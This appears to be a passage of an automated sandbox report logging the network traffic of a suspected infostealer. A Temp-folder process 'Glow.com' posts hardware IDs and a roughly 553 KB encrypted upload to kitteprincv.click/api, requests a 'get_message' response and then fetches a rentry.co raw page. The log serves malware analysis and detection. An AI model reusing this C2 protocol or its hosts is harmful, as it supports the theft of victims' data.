                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=cojs74gv88l9ubfuqb6la4hr69; expires=Wed, 16 Apr 2025 05:48:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGZH8sx5ls0u2vBYShqu7Kvnxo%2BomYKFXtleTRclBLsue%2ByNBQKi2hU6UATqMwbsKsMF8nDK2NtEHr2lwoP8ciQWru1NJFi8MZz8KfQYPinLekXbOqeBjkMZ1CN1ze9j%2FhkAlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8e65f8a42f7-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2132&min_rtt=2130&rtt_var=804&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21368&delivery_rate=1356247&cwnd=171&unsent_bytes=0&cid=0681200ab8a2eabc&ts=950&x=0"
                                                                                                                                                                        2024-12-21 12:02:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-21 12:02:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.449750104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:19 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=O6H956YO93QC
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1226
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:19 UTC1226OUTData Raw: 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 4f 36 48 39 35 36 59 4f 39 33 51
                                                                                                                                                                        Data Ascii: --O6H956YO93QCContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--O6H956YO93QCContent-Disposition: form-data; name="pid"1--O6H956YO93QCContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--O6H956YO93Q
                                                                                                                                                                        2024-12-21 12:02:19 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:19 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=mm7jmq6ujgk557ikr7tbrhs3ic; expires=Wed, 16 Apr 2025 05:48:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLri9ecKXSE8X%2Bk%2BW2h6%2BMUN44eFxmTlWrJi%2Fqh38SfEtFxTrQ48vwtCwMYksF6SqP8rFASUKwOoeXgWY5pHp%2Fk52B7tHhxw%2Ba%2BZ7loc8UeD1aRgS150Fds8Umn4mP8WIx0LJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8f73cd742ee-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1554&rtt_var=595&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2138&delivery_rate=1821584&cwnd=211&unsent_bytes=0&cid=9f7f9c443b3528b9&ts=1109&x=0"
                                                                                                                                                                        2024-12-21 12:02:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-21 12:02:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.449756104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:21 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=UZIPRQST3O1RGOF8R
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 553517
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 5a 49 50 52 51 53 54 33 4f 31 52 47 4f 46 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72
                                                                                                                                                                        Data Ascii: --UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="pid"1--UZIPRQST3O1RGOF8RContent-Disposition: form-data; name="lid"MeHdy4--pl3clear
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 6f 08 cd 7f e9 3c ae fd 6f 65 cf 08 ee 04 4e d6 b2 e2 19 ca 30 dd e3 54 aa 56 8a 1f 24 b5 f1 53 d7 31 26 4e 74 2f db f8 81 c9 a7 c0 f1 70 aa f2 fd f3 08 a8 37 44 69 28 7c 37 6e 18 f0 24 c7 c4 fa ff 5c 46 d8 57 01 34 71 39 37 db e2 2f 03 b6 4f f2 d1 69 6c 05 31 d3 05 ba a7 b1 40 ec 8a 3a ac 94 4f 48 0e f1 2d 38 eb 2c 28 10 20 4d 5c bf 31 7e 22 4e 80 36 5f ac 3e 15 7f 27 dc 6e 23 22 e0 58 d8 5e 86 d1 1f 42 b6 ce ce 07 51 c6 41 78 7d 50 d2 11 e4 3f 99 07 c1 d9 50 a5 14 fe 48 33 5c b8 1f 38 68 75 02 72 35 cf 5b 10 a9 be 71 69 51 e0 c6 bf 2d 1f 07 5c fa c6 fa de a5 8d d8 0f 39 bd 43 87 6a d6 6f 5c a5 42 05 f6 15 1d 26 25 57 13 43 5c 27 d3 a2 50 70 ef 7e 1f 11 23 4c 28 32 ed c4 d0 b4 1c 0c 48 f2 8f a7 e6 82 e2 60 47 97 35 87 06 0d fc 74 c0 d2 c1 f7 7d 7a 60 bb
                                                                                                                                                                        Data Ascii: o<oeN0TV$S1&Nt/p7Di(|7n$\FW4q97/Oil1@:OH-8,( M\1~"N6_>'n#"X^BQAx}P?PH3\8hur5[qiQ-\9Cjo\B&%WC\'Pp~#L(2H`G5t}z`
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 8b 63 fa 51 4c 90 6d 37 07 13 56 d9 1a e6 ce 7b 39 a7 59 0a 29 1f 39 92 2f 86 79 8f 69 96 0e 19 c8 f3 b1 92 93 ba b4 d4 3a 91 52 2f d1 85 a9 d5 52 78 db 1a 8c 0f 18 ae a5 9a 70 bf 7f 1c 8f 2b 1b 9d 9c 9e 8e ae d3 9f 50 72 56 01 3b 1d 23 20 82 dc 3e 3c d5 32 90 a8 a2 a4 18 11 f7 eb fd 89 63 f2 91 06 4e 5d 86 38 bf e3 2a 7c 7e bc 7c b5 ae 0e ee 51 63 d9 af 77 19 04 fe bb 6a d6 d3 02 af 4a 78 78 34 3f 8f 78 2c 9a 5f 68 4d a9 6f 49 68 67 93 9c f6 ab 8d da 47 71 04 39 94 d0 1e 9c c9 43 dd 25 f1 4a 95 57 82 a9 2d 77 42 6b f7 e4 4f ca f5 f3 7f 57 cf 9a bc 32 fa fb 6c f4 d5 f4 90 7d 7c 77 83 44 fb a8 cd 86 cf 1b a3 61 7f f1 5f 8a b5 53 21 fc e8 9f cc ee 75 a7 2b 7e 8f 32 0d 11 9d 59 a2 59 b9 2d b2 42 eb c3 b1 c7 86 a0 ee a8 2d 91 a7 3b 0a 54 d2 59 ca 13 bc 74 91
                                                                                                                                                                        Data Ascii: cQLm7V{9Y)9/yi:R/Rxp+PrV;# ><2cN]8*|~|QcwjJxx4?x,_hMoIhgGq9C%JW-wBkOW2l}|wDa_S!u+~2YY-B-;TYt
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 4e 4c 8b b4 10 19 ee b8 ce 5d 54 01 3a e7 93 ab b8 5b 1b b8 e5 be 57 c7 6e 6f a0 a4 31 cd e8 e5 ad 67 b1 54 31 76 d9 cd dd f4 28 eb 4f cf f6 7e 42 c3 8c ca 25 97 03 1b 2f fa 05 7a 32 2b 3e 8f d4 54 bc fc 87 c5 e4 e6 c7 9e ae 9e 5a f9 e3 c4 a4 36 9f 13 ea 1a fb b9 f5 9b ea 6b ec 6e f3 8a 73 ed d3 fe 4c 6a de 5e e0 28 5c 04 30 b7 4e 03 c7 0b 3b 78 76 ea f4 ca 16 0a b3 dc 86 25 58 a5 07 da 38 1c 75 7c b8 cd d7 f5 47 f7 22 ac 26 e4 26 0b a4 81 6c 4c c8 2d af 79 88 6e 17 6a 6f f0 41 1d 3f d3 fb 86 dc 66 f2 34 dc 42 0b 38 7c fc b5 81 f8 08 53 e0 21 ff ff 1d 81 8e 64 8e 42 a0 0c 0d 35 19 80 6b 65 b9 88 c8 92 88 d4 2c 45 81 0b 21 4f b5 f9 d6 e8 e2 aa d8 57 af 14 87 b4 7e 00 c2 1e a2 23 e6 19 96 f8 65 d2 d5 83 1b 58 fc c4 30 4a 05 05 12 3f 72 42 6c 22 6c 12 43 0d
                                                                                                                                                                        Data Ascii: NL]T:[Wno1gT1v(O~B%/z2+>TZ6knsLj^(\0N;xv%X8u|G"&&lL-ynjoA?f4B8|S!dB5ke,E!OW~#eX0J?rBl"lC
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: fd 43 24 66 cb 46 10 7b 84 c1 af 61 52 6e b2 cf 70 df 40 ce ab 92 b2 cf fd d3 44 39 88 b2 14 26 f5 8c 83 fe 5f 54 b8 4c 5f 9e f7 d2 b6 a7 11 e6 f9 32 f2 b5 0b 60 2a 61 4e c8 ab f9 3d 66 2c 23 d1 d4 9e f8 6f 24 02 4d 0d 15 db 23 8d 9d 47 79 a2 cd db 51 e6 4e 1a bf 2e e3 5f fa 6d bd 07 d1 1d e7 02 58 7d 08 12 cb 08 60 fa a6 d3 6d d6 cc ec ce 93 ab 27 38 d7 0c f0 f8 29 dd e0 af 92 81 58 1e 8c 30 a6 57 61 1c cd 88 2a ea 36 9a 93 fd 60 cd 68 32 c6 86 0b 35 ca 5b b9 67 3a 25 8d 8e 8c df 99 19 aa 88 df 7c 29 40 e1 e7 dc 19 0d c6 d6 93 6a af 33 99 11 7f 0f 92 eb 24 22 8d eb 10 ec 40 98 44 39 ea 12 91 d6 87 66 c4 95 ab a7 c3 f7 f8 96 9e f2 a9 48 26 5b da 67 24 e0 84 04 f7 33 4a f6 ec d2 e1 92 be cb 9a de 78 26 11 79 98 cf a4 ea c7 4a 93 d6 cd d5 cc d6 2d ee b0 26
                                                                                                                                                                        Data Ascii: C$fF{aRnp@D9&_TL_2`*aN=f,#o$M#GyQN._mX}`m'8)X0Wa*6`h25[g:%|)@j3$"@D9fH&[g$3Jx&yJ-&
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 12 e2 48 7d 2f 78 d8 3a 8f 9e 7d 9a 62 66 38 30 71 34 66 57 f5 df f7 bb 31 a4 24 35 53 39 ee 47 a2 6e 30 29 8e f4 ed 61 d4 f3 c3 b2 a2 c0 b1 49 6e 28 52 e7 eb b7 25 cb f4 8a 8e a6 78 ce 15 61 f1 1f 7f 73 3b 5c b1 77 e0 20 7f e8 04 26 d4 1f f5 63 01 17 9b 55 67 42 33 0f 9b 08 91 e0 cc 3f 09 ac f4 62 25 a8 5c 1b 07 cb be e9 15 85 d9 bb 65 60 43 0c fc 92 8b 5d 1f 25 3a d8 f6 ea 2c b1 ba be 5b c2 f6 c2 0b 2f 9e fe ef 30 cd f5 0c ec 1d 2e 69 11 fa 2b c4 4e 54 95 89 a4 c2 36 63 b5 a2 2c bb 75 b5 da 67 28 43 dd 0f f3 5e 1f dc 9f 7d e6 02 fa e6 1a e3 cc ce 4c 91 ab d0 4d aa ba e6 32 7a 16 bd 9c 33 63 73 94 4c 67 2d a9 d2 c6 00 78 8b 66 cc b3 fa 48 69 22 80 b0 47 2c 4a 89 9b dd b0 bd 36 f8 ef ba e4 48 0d b3 73 ea 67 82 dc 71 67 78 1f 68 50 d9 d9 ef 30 db 02 61 c0
                                                                                                                                                                        Data Ascii: H}/x:}bf80q4fW1$5S9Gn0)aIn(R%xas;\w &cUgB3?b%\e`C]%:,[/0.i+NT6c,ug(C^}LM2z3csLg-xfHi"G,J6HsgqgxhP0a
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: 11 96 07 2e 78 ff c1 8c 29 b8 b9 b2 14 6a c9 a3 e4 31 6c f3 ff ae 1d fb 9f a3 56 a7 b7 cf 7f bb 51 4d 4a 57 56 fc d3 2e e2 08 30 6c 0a 87 b0 a3 b8 a8 c9 11 1f ad e7 1f c7 e2 5d ee 04 7e 3b f2 68 69 2b d3 cb 78 9f c8 86 97 a3 80 42 75 cf 4b 6f 4c d1 f0 65 1c 1e f1 fd 77 3a 76 ac 78 c1 9c c4 ff 75 b3 1d 51 07 a4 9d aa 8c 6e 66 9b a7 fa 3e 71 70 e5 9f d4 1d b1 ce 3c 88 22 41 98 50 da 63 8f 1c 9b af 85 c0 ec b3 50 88 28 97 a5 0c 39 0a f7 9e e4 68 9d 4b e3 de eb 41 c7 f4 e1 5d 2e 12 03 79 ef 47 5a b4 6d 6a d6 8a 66 79 c8 95 ac 69 66 8e 50 a7 68 b8 8b 64 71 44 f5 11 60 31 9a a9 81 fa 8e ed fd 4b 1b ae 68 b8 8a 83 d4 1a b0 b1 57 23 cb 21 6b 47 7b 09 c0 53 e3 04 11 87 42 f0 ac 62 e7 ec 2c 91 49 d6 e1 c1 ef 57 28 95 bb 6e 2b 31 47 26 58 96 62 59 d8 b0 9f bf 5a fd
                                                                                                                                                                        Data Ascii: .x)j1lVQMJWV.0l]~;hi+xBuKoLew:vxuQnf>qp<"APcP(9hKA].yGZmjfyifPhdqD`1KhW#!kG{SBb,IW(n+1G&XbYZ
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: d0 d5 10 74 93 86 75 d4 d5 b4 b8 72 76 12 f9 68 69 73 45 6f eb 93 ad da 37 bf 2c 08 29 09 32 56 6c 23 1e 1d 1c ce 5f 34 b0 e9 cd 2e ee 68 47 b7 fd 31 14 0c 02 8f a0 0c 87 bd a5 97 8a e5 52 46 5c 4e 6d 4a 23 3c 97 9d 33 8d 9b d0 a7 10 a1 91 58 2f a4 3a 75 35 3b 75 d7 1b 0c 70 39 bf 2e c7 8a 77 c6 cb 07 7f f7 85 b5 f1 c5 49 df 7c 87 f2 af 4d 65 b0 f4 76 ec 65 11 19 4d e8 26 59 45 04 53 b1 d7 20 61 a3 8a 43 b8 97 63 ba bf 7f 24 8a a2 30 7a 6b 95 5c 79 9c a3 57 5f cd 4d f9 07 f4 28 42 1a 46 c7 b4 56 aa 97 3d ac 2d 71 62 22 c3 ea 53 42 38 b7 8f 3f b9 c0 aa 74 70 ea 48 ee 91 d0 e4 23 27 cf ff 3b 6d c6 22 ad 8b ee b0 23 4a be b1 c5 b6 cd ca 45 ad f4 9c 86 32 b2 7d 12 77 5e 5c 9a 36 1c fd 64 07 7d e6 79 02 9f c5 82 79 e1 be f4 73 40 6b e1 00 b1 04 81 38 ca bb 29
                                                                                                                                                                        Data Ascii: turvhisEo7,)2Vl#_4.hG1RF\NmJ#<3X/:u5;up9.wI|MeveM&YES aCc$0zk\yW_M(BFV=-qb"SB8?tpH#';m"#JE2}w^\6d}yys@k8)
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: d9 d7 da 2c 0c 16 d9 08 2b 30 f0 10 5f 92 9d 4d d3 c1 91 4d 62 fb ff ff 13 13 ce 00 4e db d1 0f c8 e2 ce a1 76 19 a2 3a f4 23 7f bc f3 dd ba ac 2d 3f 51 6d 4e d0 14 00 12 58 a9 54 f7 3c 35 c2 82 9e 9e 11 fa e8 dd 06 fd a1 13 03 be e9 4f 5a bb 3f 3f cc 37 13 e4 dd 9a b7 ff 64 44 fd df 2d 31 41 10 e2 b3 b8 88 06 da f8 2b 38 f0 16 5d 28 80 1a 26 93 25 ff 09 4e d3 f6 49 dc 3c 56 63 69 cc ef ab 83 60 c0 80 13 e4 1c 59 6a 2f 8a 1e e0 50 a8 34 cc 95 3c dc 2f 35 e2 1a 8f 1d 51 a5 0b 60 b4 59 9e d1 d4 60 80 5f 7f cc 1a 5b 01 7c 2a e6 83 c7 45 de 6c c5 ed 9b b6 42 f3 da f9 f0 99 39 53 35 27 4e 6d 3e ab 48 35 e6 15 1c 13 bf 07 c1 46 dd fa eb 57 1c 24 50 d7 13 26 20 70 83 80 6b c0 d5 2b 47 85 ec a6 f2 03 08 07 ad 10 f7 86 ee e4 da b5 e6 cc 92 5d 6c 4c 9d 46 b0 97 2d
                                                                                                                                                                        Data Ascii: ,+0_MMbNv:#-?QmNXT<5OZ??7dD-1A+8](&%NI<Vci`Yj/P4</5Q`Y`_[|*ElB9S5'Nm>H5FW$P& pk+G]lLF-
                                                                                                                                                                        2024-12-21 12:02:21 UTC15331OUTData Raw: b7 c3 c9 8d 28 b9 d4 14 6f 11 8d 78 0b 8b 67 5a 0a 57 92 45 48 bb d6 6f 1a 69 af 39 a8 67 f2 45 3a 8f 9c 8c a0 bf bc 29 39 61 6a f9 29 9a 7f 83 cf 87 80 ae bd 8e 26 9c e1 bf 26 29 e8 38 af 4f 13 f8 6a ff 7f 2f bd b1 8e d3 3b 99 09 f1 31 89 65 3b 0d 79 99 77 d5 bc 04 11 6f cc a2 c7 1a 13 01 c3 ee 28 c8 3f 3c a3 02 e5 ff 32 63 ba 3b 0c 5f bc fa 45 b4 72 e7 cd 62 b6 06 02 22 bf b8 a6 9e f6 66 5d cd 0f 67 24 e4 2f d5 4c b8 4c c1 13 b5 4d a4 0a b4 ba 80 65 eb 8e d0 a3 30 0c 53 83 62 d4 0a 4d 71 de ee d7 97 8b 54 52 26 00 ec e4 e8 1d e7 6f 0c f9 ce 0e f4 f4 90 3e e0 3a 7f 60 b4 26 bc e7 b6 80 63 d0 c2 ab 79 7b 15 62 0b 3d cb 63 b0 52 6e b0 e4 ae 4b be d8 c2 40 98 54 a4 77 b3 72 c7 d8 52 b1 36 3d 8a 5a 37 eb 91 17 82 70 2f 60 ec cf f5 b1 57 84 41 88 f7 dc ac 3c
                                                                                                                                                                        Data Ascii: (oxgZWEHoi9gE:)9aj)&&)8Oj/;1e;ywo(?<2c;_Erb"f]g$/LLMe0SbMqTR&o>:`&cy{b=cRnK@TwrR6=Z7p/`WA<
                                                                                                                                                                        2024-12-21 12:02:23 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:23 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=qspd3ldt2jp0d531r2jpde8utc; expires=Wed, 16 Apr 2025 05:49:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmyrYPf93x3iwWCXa8OnMjLkZ5BVelDKEU2jnntEz85HCzN14Kg5LY277MzxZkx0qUdyymmAYARLpX5NNTnq8g6Wx%2F%2FoJUO%2B9MJ6X2MRlwcD3w43vg2bxUCjl3sD8%2BQqAmkPXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b90649d0421c-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2325&min_rtt=2321&rtt_var=879&sent=338&recv=578&lost=0&retrans=0&sent_bytes=2843&recv_bytes=556020&delivery_rate=1239915&cwnd=252&unsent_bytes=0&cid=dc76fb0cdafa884c&ts=2245&x=0"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.449767104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:25 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 85
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:25 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 26 6a 3d 26 68 77 69 64 3d 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32
                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl3clear&j=&hwid=7B1B62891CC99BA11145237798DF8CC2
                                                                                                                                                                        2024-12-21 12:02:25 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:25 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=h9cp0m5i2os5seq825i771faaq; expires=Wed, 16 Apr 2025 05:49:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OipYskbIo%2F9H1e4k0TRnZbg3LC%2FKJNlsK0D9gA8SV2IGhmEGDZr1nPE%2FdoNxZWMPKrsjnzTgj1fonwb%2FajWyLEOiVITyMnn%2BrXRz4OAblF7ZHUl4ppl9flzAgYAvOEfr3RCcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b91ccd7a4368-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2447&min_rtt=2443&rtt_var=924&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=986&delivery_rate=1178845&cwnd=233&unsent_bytes=0&cid=1b069637747855c1&ts=793&x=0"
                                                                                                                                                                        2024-12-21 12:02:25 UTC126INData Raw: 37 38 0d 0a 32 51 4f 41 5a 37 58 4c 64 47 51 39 79 6d 31 66 30 62 79 72 76 6f 4f 6b 6c 55 75 6f 41 74 37 51 44 65 43 34 72 66 77 73 64 35 47 43 65 4b 49 53 6c 2f 46 57 44 45 6d 2b 48 53 7a 72 34 49 54 69 72 4e 62 77 4a 64 78 77 70 2f 35 75 6a 2b 53 43 6d 6b 6b 59 35 4c 78 30 35 56 4c 70 35 41 59 46 53 75 68 42 66 62 66 49 69 59 53 78 69 4c 63 75 69 6a 6a 75 72 56 41 3d 0d 0a
                                                                                                                                                                        Data Ascii: 782QOAZ7XLdGQ9ym1f0byrvoOklUuoAt7QDeC4rfwsd5GCeKISl/FWDEm+HSzr4ITirNbwJdxwp/5uj+SCmkkY5Lx05VLp5AYFSuhBfbfIiYSxiLcuijjurVA=
                                                                                                                                                                        2024-12-21 12:02:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.449773104.26.3.164437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:27 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Host: rentry.co
                                                                                                                                                                        2024-12-21 12:02:27 UTC935INHTTP/1.1 200 OK
